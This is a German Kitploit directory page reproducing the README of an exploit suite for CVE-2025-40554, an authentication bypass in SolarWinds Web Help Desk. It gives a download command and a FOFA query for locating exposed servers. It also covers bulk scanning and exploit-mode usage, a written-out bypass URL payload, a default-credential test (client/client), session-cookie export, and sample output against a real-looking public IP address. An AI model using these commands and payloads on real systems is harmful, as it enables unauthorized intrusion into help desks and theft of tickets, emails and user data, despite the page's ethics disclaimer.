Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-40554 — CVE-2025-40554 Exploitation | Kitploit
Tools/GitHubGitHub/skynoxk/cve-2025-40554
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsAuthentifizierung
GitHubskynoxk/cve-2025-40554

CVE-2025-40554

CVE-2025-40554 Exploitation

Repository anzeigen
2vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-40554 Exploitation Suite

Ein umfassendes Sicherheitstesttool zur Erkennung und Ausnutzung der Authentifizierungsbypass-Schwachstelle (CVE-2025-40554 / CVE-2025-40536) in SolarWinds Web Help Desk.

⚠️ Haftungsausschluss

NUR FÜR BILDUNGSZWECKE UND AUTORISIERTE SICHERHEITSTESTS

Dieses Tool wird für Sicherheitsforschung, Penetrationstests und Schwachstellenbewertungen auf Systemen bereitgestellt, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben. Unbefugter Zugriff auf Computersysteme ist illegal. Die Autoren sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

🔍 Schwachstellenübersicht

CVE-2025-40554 ist eine kritische Authentifizierungsbypass-Schwachstelle in SolarWinds Web Help Desk, die es nicht authentifizierten Angreifern ermöglicht:

  • Authentifizierungsmechanismen zu umgehen
  • Auf privilegierte administrative Funktionen zuzugreifen (Authentifizierung)
  • Systemkonfiguration zu enumerieren

Betroffene Versionen

  • SolarWinds Web Help Desk (spezifische Versionsinformationen sollten überprüft werden)
  • Überprüfen Sie SolarWinds-Sicherheitshinweise auf gepatchte Versionen

🚀 Funktionen

Überzeugen Sie sich selbst :))

Abhängigkeiten:

  • Python 3.6+
  • requests-Bibliothek
  • urllib3-Bibliothek

🛠️ Installation

root@kitploit:~
# Skript herunterladen
wget https://raw.githubusercontent.com/username/repo/main/CVE-2025-40554.py

# Ausführbar machen
chmod +x CVE-2025-40554.py

📖 FOFA

root@kitploit:~
("Web Help Desk") && (icon_hash="1895809524" || icon_hash="804130677")

📖 Verwendung

Einfacher Scan (Einzelziel)

root@kitploit:~
# Einfache Schwachstellenprüfung
python3 CVE-2025-40554.py -t https://ziel:8443

# Mit explizitem Protokoll
python3 CVE-2025-40554.py -t https://203.106.221.203:8443

Vollständiger Exploit-Modus

root@kitploit:~
# Vollständige Ausnutzung mit Session-Enumeration
python3 CVE-2025-40554.py -t https://ziel:8443 --exploit

# Standard-Anmeldeinformationen-Test überspringen
python3 CVE-2025-40554.py -t https://ziel:8443 --exploit --no-login

Bulk-Scan

root@kitploit:~
# Mehrere Ziele aus einer Datei scannen
python3 CVE-2025-40554.py -l targets.txt

# Bulk-Scan mit Exploit
python3 CVE-2025-40554.py -l targets.txt --exploit

# Ruhiger Modus (minimale Ausgabe)
python3 CVE-2025-40554.py -l targets.txt -q

# Benutzerdefinierte Ausgabedatei
python3 CVE-2025-40554.py -l targets.txt -o ergebnisse.txt

Ziel-Dateiformat

targets.txt:

root@kitploit:~
https://ziel1:8443
https://ziel2.beispiel.com:8443
192.168.1.100:8443
ziel3.local:8443
# Kommentare werden unterstützt

🎯 Befehlszeilenoptionen

📊 Ausgabebeispiele

Erfolgreicher Exploit

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║     CVE-2025-40554 - SolarWinds Web Help Desk                    ║
║     Authentifizierungsbypass-Exploitationstool                   ║
║     Nur für Forschungs- & Bildungszwecke                         ║
╚═══════════════════════════════════════════════════════════════════╝

======================================================================
Ziel: https://203.106.221.203:8443
======================================================================
[*] Schritt 1: Session aufbauen...
[+] WOSID extrahiert: AbCdEfGhIjKlMnOpQrStU
[+] XSRF-Token: abc123-def456-ghi789

[*] Schritt 2: Authentifizierungsbypass testen...
[+] Bypass-Indikatoren gefunden: externalAuthContainer, JSONRpcClient, SAML 2.0
[+] ANFÄLLIG - Auth-Bypass bestätigt!

[*] Schritt 3: Standard-Anmeldeinformationen testen (client/client)...
[+] ERFOLG - Standard-Anmeldeinformationen funktionieren!

======================================================================
EXPLOIT-MODUS - CVE-2025-40554 Auth-Bypass
======================================================================

[*] Bypass-URL: https://203.106.221.203:8443/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/AbCdEfGhIjKlMnOpQrStU/1.0?badparam=/ajax/&wopage=LoginPref
[*] Authentifizierungsbypass auslösen...
[+] Auth-Bypass erfolgreich!

[*] Session-Cookies:
  wosid = AbCdEfGhIjKlMnOpQrStU
  XSRF-TOKEN = abc123-def456-ghi789

======================================================================
ZUSAMMENFASSUNG
======================================================================
[+] Ziel ist ANFÄLLIG für CVE-2025-40554
[+] Standard-Anmeldeinformationen: FUNKTIONIEREN
======================================================================

Bulk-Scan-Ergebnisse

root@kitploit:~
[*] 5 eindeutige Ziele aus targets.txt geladen
[*] Modus: Bypass + Standard-Anmeldeinformationen-Test
[*] Vollständiger Exploit aktiviert

[1/5] Teste https://ziel1:8443
[+] ANFÄLLIG - Auth-Bypass bestätigt!
[+] ERFOLG - Standard-Anmeldeinformationen funktionieren!

[2/5] Teste https://ziel2:8443
[!] NICHT ANFÄLLIG - Auth-Bypass fehlgeschlagen

...

======================================================================
SCAN-ZUSAMMENFASSUNG
======================================================================
Insgesamt gescannt:   5/5
Anfällig:            2
Mit Standard-Anmeld: 1
======================================================================

[+] Ergebnisse gespeichert in: vulnerable_targets.txt

🔧 Technische Details

Exploit-Ablauf

  1. Session-Aufbau

    • Stellt Verbindung zur WHD-Instanz her
    • Extrahiert WOSID (WebObjects Session ID) aus mehreren Quellen
    • Erfasst XSRF-Token, falls vorhanden
  2. Authentifizierungsbypass

    • Erstellt bösartige URL mit WOSID-Injection
    • Nutzt Path Traversal im WebObjects-Routing aus
    • Umgeht Authentifizierungsprüfungen
  3. Anmeldeinformationen-Test (optional)

    • Analysiert Login-Formular mit CSRF-Schutz
    • Testet Standard-Anmeldeinformationen (client/client)
    • Validiert erfolgreiche Authentifizierung
  4. Vollständiger Exploit (--exploit-Modus)

    • Exportiert Session-Cookies
    • Zugriff auf E-Mails, Tickets, Datenbank, Benutzer (entfernt)

Schwachstellen-Indikatoren

Das Tool erkennt erfolgreichen Bypass durch Überprüfung von:

  • externalAuthContainer - Externe Auth-Konfiguration
  • JSONRpcClient - API-Client-Exposition
  • SAML 2.0 - SSO-Konfiguration
  • LoginPref - Login-Präferenzeinstellungen
  • authMode - Authentifizierungsmodus-Einstellungen

🤝 Beitragen

Beiträge sind willkommen.....

📚 Referenzen

  • CVE-2025-40554 Details
  • CVE-2025-40536 Details
  • SolarWinds Sicherheitshinweise
  • WebObjects Framework Dokumentation

📄 Lizenz

Dieses Tool wird "wie besehen" ohne jegliche Gewährleistung bereitgestellt. Nutzung auf eigenes Risiko.

👤 Autor

Skynoxk


Denken Sie daran: Hacken Sie immer ethisch und legal. Unbefugter Zugriff ist eine Straftat.

Tool herunterladen
OptionBeschreibung
-t, --target URLEinzelne Ziel-URL zum Testen
-l, --list DATEIDatei mit einer Liste von Zielen (eines pro Zeile)
--exploitVollständigen Exploit-Modus mit Enumerierung aktivieren
--no-loginStandard-Anmeldeinformationen-Test überspringen
-o, --output DATEIAusgabedatei für anfällige Ziele (Standard: vulnerable_targets.txt)
-q, --quietMinimaler Ausgabemodus (nützlich für Bulk-Scans)